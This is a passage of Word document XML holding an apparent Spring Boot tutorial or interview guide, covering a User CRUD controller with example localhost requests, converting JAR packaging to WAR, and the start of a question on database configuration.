    <w:p w14:paraId="3622CFB9"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ostMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7087BAF4"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User createUser(@RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221C1F2C"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userService.saveUser(user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE4B0A1"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7F58DB90" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EEC23AB"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 xml:space="preserve">    // Get all Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14211072"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tMapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5380972A"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List&lt;User&gt; getAllUsers() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0734177A"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userService.getAllUsers();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74756867"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57332363" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FE1836D"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Get a User by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697BCD1A"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tMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D785CD9"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Optional&lt;User&gt; getUserById(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8EDB15"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userService.getUserById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C777DD6"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5F233FF9" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="665A2D5D"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Update a User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8B36EE"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tMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C722BF"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User updateUser(@PathVariable Long id, @RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398CF4DF"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You can modify this logic as per your requirements, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9ACFAC"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e.g., check if the user exists first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211DF053"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user.setId(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149956EE"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userService.saveUser(user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A89378"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32E4679" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11526EAB"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Delete a User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226C6061"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DeleteMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BA1CF1"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deleteUser(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F509C4"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userService.deleteUser(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B84713A"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02F8B3C9"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1A15E736"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7. Testing the Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5553B725"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You can test CRUD operations using tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Postman</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Curl</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A5DD96"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reate User</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: POST /api/users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0132807D"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Get All Users</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: GET /api/users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0977E958"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Get User by ID</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: GET /api/users/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583F95B5"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pdate User</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: PUT /api/users/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5F23B3"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elete User</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: DELETE /api/users/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE94B37"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Example Requests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F757DE"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reate User</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F2C627" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969"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RL: POST http://localhost:8080/api/users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A88C3A" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969"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Body (JSON):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A18608B"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043C7550"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name": "John Doe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6D361C"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mail": "john.doe@example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC1A4EA"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5E08F8E"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Get All Users</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F01FAA" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969"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RL: GET http://localhost:8080/api/users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FB97DE"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Get User by ID</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFE1B0F" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969"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RL: GET http://localhost:8080/api/users/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6560C824"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pdate User</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEB0809" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969"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RL: PUT http://localhost:8080/api/users/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA01DE1" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969"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Body (JSON):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA72E0E"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49ECFE3"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name": "John Smith",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9A1A98"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mail": "john.smith@example.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FB1EF9"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39E0038F"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elete User</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F55B44" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969"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RL: DELETE http://localhost:8080/api/users/1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBB2323"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523FAA9D"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lastRenderedPageBreak/>
        <w:t>Spring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides a streamlined way to perform CRUD operations using </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F812C03"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reate an entity class to map the database table, a repository to handle database queries, a service layer to manage business logic, and a controller to handle HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49826D45"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standard Spring Data JPA repository interface (JpaRepository) handles the CRUD functionality automatically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D48205C" w14:textId="6AB28A42"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FBC6D1C">
          <v:rect id="_x0000_i2615" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="788BA452" w14:textId="42C8C90E" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00864748">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="621" w:name="_Toc196308101"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to change from JAR to WAR in Spring boot</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="621"/>
    </w:p>
    <w:p w14:paraId="6FB5779C" w14:textId="422D7418" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969"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To change your Spring Boot project from a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JAR</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WAR</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Web Application Archive), follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBA8972"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Update pom.xml (for Maven)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523791EF"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f you're using </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Maven</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you need to change the packaging type from jar to war and configure the necessary dependencies to support a web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E66E84"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hange Packaging Type</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: In your pom.xml, change the &lt;packaging&gt; element from jar to war.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2A9EFB"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packaging&gt;war&lt;/packaging&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D220C01"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dd a Dependency for spring-boot-starter-web</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure that you have the necessary dependency for a web application in your pom.xml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E334FEB"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618D9DC5"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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EA7FA3"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spring-boot-starter-web&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2F475E"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23D188A3"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clude Tomcat from Spring Boot Starter</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Since Spring Boot includes an embedded Tomcat server by default, and a WAR file requires an external servlet container, you need to exclude the embedded Tomcat dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3873A47D"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477A2FFE"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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35900249"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spring-boot-starter-tomcat&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B46A48"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scope&gt;provided&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545E3C19"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3E34734F"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dd the Spring Boot Maven Plugin Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Make sure your spring-boot-maven-plugin is configured to handle the WAR packaging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D386A92"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build&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785D712D"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plugins&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CBBB37"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plugin&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DA0E2A"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org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5E2B4A"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spring-boot-maven-plugin&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AF7B0B"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configuration&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37102193"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mainClass&gt;com.example.YourMainClass&lt;/mainClass&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E4D04F"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configuration&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65181A3F"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plugin&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B3E1E4"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plugins&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EDC88F"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build&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583402E5"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configuration ensures that Spring Boot runs your WAR as a web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5FE913"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Update SpringBootApplication Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207D6E99"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r main application class (@SpringBootApplication annotated class) should extend SpringBootServletInitializer to support the WAR deployment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07089E41"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boot.SpringApplication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ABDFB4"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boot.autoconfigure.SpringBootApplication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB1F029"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boot.web.servlet.support.SpringBootServletInitializer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2156FA70" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D24E3E"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BootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1052CD"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Application extends SpringBootServletInitializer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704557BD" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F43E2A0"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atic void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A59DC6E"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pringApplication.run(Application.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446A4CAA"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D0BF465" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EAB89FB"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D91A01"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otected SpringApplicationBuilder configure(SpringApplicationBuilder application) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C77E91"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 xml:space="preserve">        return application.sources(Application.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044F513A"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71EBDBA9"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0056C814"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Build the WAR File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C46471D"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Once you've updated the pom.xml file, run the following Maven command to build your WAR file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F22DE94"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mvn clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C1C117"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command will generate a *.war file inside the target/ directory of your project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F19435B"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4. Deploy the WAR to an External Servlet Container (like Tomcat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7739D624"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After the WAR is built, you can deploy it to an external servlet container like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D92C5A"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Tomcat</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Place the WAR file in the webapps/ directory of your Tomcat installation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2687232E"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Other Containers</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For other containers, check their deployment instructions for WAR files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295D752E"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5. Optional: Application Properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0165200C"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define properties specific to WAR deployments in the application.properties or application.yml files. For example, configuring ports, context paths, etc., for the web container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8B1C47"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C89C8F"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o change from a JAR to a WAR in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492AEF98"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hange the packaging type in pom.xml.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F36654D"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clude embedded Tomcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D8EE99"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sure your main application class extends SpringBootServletInitializer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01464332"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Build the WAR file using Maven.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8C7FF2"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Deploy the WAR to an external web server like Tomcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C155C41"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will enable your Spring Boot application to be packaged as a WAR and deployed on a traditional servlet container like Tomcat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766B5DE5" w14:textId="280E88C9"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37E8705">
          <v:rect id="_x0000_i2616" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5D3AAC" w14:textId="439DA2E6" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00864748">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="622" w:name="_Toc196308102"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where will you give database details in the spring boot application</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
